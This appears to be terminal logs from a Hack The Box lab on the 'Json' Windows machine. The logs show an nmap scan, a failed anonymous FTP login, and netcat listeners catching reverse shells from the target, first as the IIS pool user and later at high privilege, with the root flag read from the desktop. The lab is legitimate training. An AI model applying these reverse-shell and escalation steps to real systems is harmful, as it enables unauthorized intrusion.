~/Documents/HTB/Json root@kali ❯ cat nmap.txt # Nmap 7.80 scan initiated Sat Feb 8 10:18:41 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.158 Nmap scan report for 10.10.10.158 Host is up (0.24s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd | ftp-syst: |_ SYST: UNIX emulated by FileZilla 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: Json HTB 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 8 10:20:33 2020 -- 1 IP address (1 host up) scanned in 112.34 seconds
~/Documents/HTB/Json root@kali 7s ❯ ftp 10.10.10.158 Connected to 10.10.10.158. 220-FileZilla Server 0.9.60 beta 220-written by Tim Kosse (tim.kosse@filezilla-project.org) 220 Please visit https://filezilla-project.org/ Name (10.10.10.158:root): anonymous 331 Password required for anonymous Password: 530 Login or password incorrect! Login failed. Remote system type is UNIX. ftp>
~/Documents/HTB/Json root@kali ❯ nc -nlvp 1337 listening on [any] 1337 ... connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52223 Windows PowerShell running as user JSON$ on JSON Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>^C
~/Documents/HTB/Json root@kali 12m 9s ❯ nc -nlvp 1337 listening on [any] 1337 ... connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52281 Windows PowerShell running as user JSON$ on JSON Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>cd C:\users PS C:\users> dir
User Name SID ============= ============================================= json\userpool S-1-5-21-1325271270-1453780805-384807897-1004
GROUP INFORMATION -----------------
Group Name Type SID Attributes ==================================== ================ =============================================================== ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group IIS APPPOOL\Json.Net Well-known group S-1-5-82-1097026443-1840990353-1306629843-3865948041-3469430407 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Host Name: JSON OS Name: Microsoft Windows Server 2012 R2 Datacenter OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-80005-00001-AA602 Original Install Date: 5/22/2019, 4:27:16 PM System Boot Time: 2/7/2020, 10:45:54 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: es-mx;Spanish (Mexico) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 6,143 MB Available Physical Memory: 5,021 MB Virtual Memory: Max Size: 7,807 MB Virtual Memory: Available: 6,547 MB Virtual Memory: In Use: 1,260 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 2 DHCP Enabled: No IP address(es) [01]: 10.10.10.158 [02]: fe80::f59a:5ad4:1e60:d4c9 [03]: dead:beef::f59a:5ad4:1e60:d4c9 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. PS C:\users\userpool>
~/Documents/HTB/Json root@kali ❯ nc -nlvp 1337 listening on [any] 1337 ... connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52336 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\users\superadmin cd C:\users\superadmin
C:\Users\superadmin>cd desktop cd desktop
C:\Users\superadmin\Desktop>type root.txt type root.txt 3cc85d1bed2ee84af4074101b991d441 C:\Users\superadmin\Desktop>